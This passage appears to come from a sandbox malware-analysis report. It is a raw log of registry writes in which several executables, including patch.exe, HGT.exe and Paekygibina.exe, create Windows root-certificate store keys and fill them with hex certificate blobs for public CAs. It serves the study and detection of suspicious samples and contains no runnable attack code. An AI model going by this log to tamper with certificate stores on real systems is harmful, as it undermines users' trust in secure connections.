0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd HGT.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794 Paekygibina.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 HGT.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Paekygibina.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 md7_7dfj.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e md7_7dfj.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Paekygibina.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Paekygibina.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A Paekygibina.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd HGT.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606